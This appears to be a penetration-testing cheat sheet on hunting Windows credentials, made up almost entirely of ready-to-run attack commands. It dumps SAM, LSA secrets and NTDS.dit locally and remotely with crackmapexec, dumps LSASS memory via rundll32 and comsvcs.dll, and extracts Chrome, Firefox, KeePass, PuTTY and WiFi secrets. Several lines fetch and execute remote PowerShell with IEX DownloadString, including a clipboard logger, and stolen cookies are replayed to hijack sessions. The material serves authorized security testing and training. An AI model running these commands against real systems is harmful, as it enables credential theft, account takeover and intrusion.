Cred Hunting

First part is big bunch of commands from cmd and powershell. Want more delailed info? Use AI. And second big part is just a lot of different techniques and tools. Happy Hunting)

CMD

# Search file
C:\> findstr /s /i flag n:\*.*
C:\> dir n:\*flag* /s /
# Search for Strings within Files
C:\> findstr /si password *.xml *.ini *.txt *.config
C:\> findstr /spin "password" *.*
C:\> cd c:\Users\rio\Documents & findstr /SI /M "password" *.xml *.ini *.txt
C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
# Search for File Extensions
C:\> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
C:\> where /R C:\ *.config

POWERsHELL

# Searching for Files (by Name or Pattern)
PS C:\> Get-ChildItem -Recurse -Path N:\ -Include *flag* -File
PS C:\> Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
#$ Searching for strings within files
PS C:\> Get-ChildItem -Recurse -Path C:\ | Select-String "flag" -List
PS C:\> Select-String -Path C:\Users\rio\Documents\*.txt -Pattern password

Powershell History File

PS C:\> (Get-PSReadLineOption).HistorySavePath
PS C:\> gc (Get-PSReadLineOption).HistorySavePath
PS C:\> Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

Powershell Credentials

They are often used for automation and scripting, and usually protected with DPAPI. But If we have gained command execution in the context of this user or can abuse DPAPI, then we can recover the cleartext credentials from encrypted.xml.

PS C:\> $credential = Import-Clixml -Path 'C:\scripts\pass.xml'
PS C:\> $credential.GetNetworkCredential().username
PS C:\> $credential.GetNetworkCredential().password

SAM Registry Hives Copy

If we have local admin access on target, we could copy three registry SAM hives, which would help us to dump and crack hashes

Registry Hive
Description

HKLM\sam

Hashes associated with local account passwords

HKLM\system

System bootkey, which is encryption/decryption key for SAM

HKLM\security

Cached credentials for domain accounts, it is not 100% needed, but would help a lot

For dumping hives we would use reg.exe as admin

C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save

Running secretsdump.py

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Remote Dumping

Dumping LSA Secrets Remotely

crackmapexec smb 13.13.13.13 --local-auth -u rio -p rio@123 --lsa

Dumping SAM Remotely

crackmapexec smb 13.13.13.13 --local-auth -u rio -p rio@123 --sam

Dumping NTDS.dit Remotely

crackmapexec smb 13.13.13.13 -u rio -p rio@123 --ntds

LSASS Dumping

Rundll32.exe & Comsvcs.dll Method

IMPORTANT: Anitivirus would see this as malicious activity. The point of method is that we use rundll32.exe to call an exported function of comsvcs.dll which also calls the MiniDumpWriteDump (MiniDump) function to dump the LSASS process memory to a specified directory (C:\lsass.dmp). But to do this we'll need a LSASS PID. with tasklist /svc in cmd or Get-Process lsass in powershell. With PID we could dump LSASS memory.

PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 666 C:\lsass.dmp full

Shadow Copy of C:

PS C:\> vssadmin CREATE SHADOW /For=C:

NTDS.dit

crackmapexec smb 13.13.13.13 -u rio -p rio@123 --ntds

Cmdkey Saved Credentials

  • cmdkey can be used to create, list, and delete stored usernames and passwords.

  • Credentials stored for Remote Desktop (RDP) or other remote hosts can be exploited.

Listing Saved Credentials:

C:\> cmdkey /list

  • Saved credentials will be used when connecting via RDP.

  • Can be exploited using runas:

PS C:\> runas /savecred /user:rio\rio"COMMAND HERE"

Browser Credentials

Retrieving Saved Credentials from Chrome

Using SharpChrome [LINK] to extract saved passwords:

PS C:\> .\SharpChrome.exe logins /unprotect

  • Chrome credential storage can be found at:

    • AES state key: C:\Users\rio\AppData\Local\Google\Chrome\User Data\Local State

    • Login data: C:\Users\rio\AppData\Local\Google\Chrome\User Data\Default\Login Data

  • Credentials can be extracted and reused.

Password Managers

  • Targets include KeePass, 1Password, Thycotic, and CyberArk.

  • KeePass databases (.kdbx) files can be extracted and cracked.

Extracting KeePass Hash:

python2.7 keepass2john.py ARASAKA_Help_Desk.kdbx

Cracking KeePass Hash with Hashcat:

hashcat -m 13400 keepass_hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt

  • MailSniper [LINK] can be used to search domain-joined email accounts for passwords.

LaZagne

LaZagne [LINK] is versatile tool which retrieves credentials from browsers, chat clients, databases, sysadmin tools, etc.

Run all modules:

PS C:\> .\lazagne.exe all

SessionGopher

Extracting Remote Access Credentials

  • Extracts saved PuTTY, WinSCP, FileZilla, and RDP credentials.

Running SessionGopher [LINK]

PS C:\> Import-Module .\SessionGopher.ps1
PS C:\> Invoke-SessionGopher -Target ARASAKA-SRV1

Windows Registry

Windows AutoLogon

Stored in:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Retrieve:

PS C:\> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

PuTTY Saved Credentials

Stored in:

HKEY_CURRENT_USER\SOFTWARE\VTheMerc\PuTTY\Sessions

Retrieve:

PS C:\> reg query HKEY_CURRENT_USER\SOFTWARE\VTheMerc\PuTTY\Sessions

WiFi Passwords

Listing Saved Wireless Networks:

C:\> netsh wlan show profile

Retrieving Saved Wireless Passwords:

C:\> netsh wlan show profile arasaka_corp key=clear

COOKIES

Firefox

Copy Firefox Cookies Database

PS C:\> copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .

Extract cookies from database

For this we'll be using cookieextractor.py script [LINK]

python3 cookieextractor.py --dbpath "/home/rio/cookies.sqlite" --host slack --cookie d

  • After this we could use Cookie Editor browser extenstion to paste stolen cookie into our session

Chrome

Chromium-based browsers also use sqlite databases but usually encrypts it with DPAPI, which is commonly used to encrypt data using information from the current user account or computer. To get cookie value we need to decrypt from compromised user session. SharpChromium script [LINK] will help us with it

Invoke-SharpChromium

PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSh
arpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
PS C:\> Invoke-SharpChromium -Command "cookies slack.com"

CLIPBOARD

For this we are using Invoke-ClipboardLogger script [LINK]

PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1')
PS C:\> Invoke-ClipboardLogger

INTERESTING FILES

unattend.xml
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*
PreviousPivotingNextPrivilege Escalation

Last updated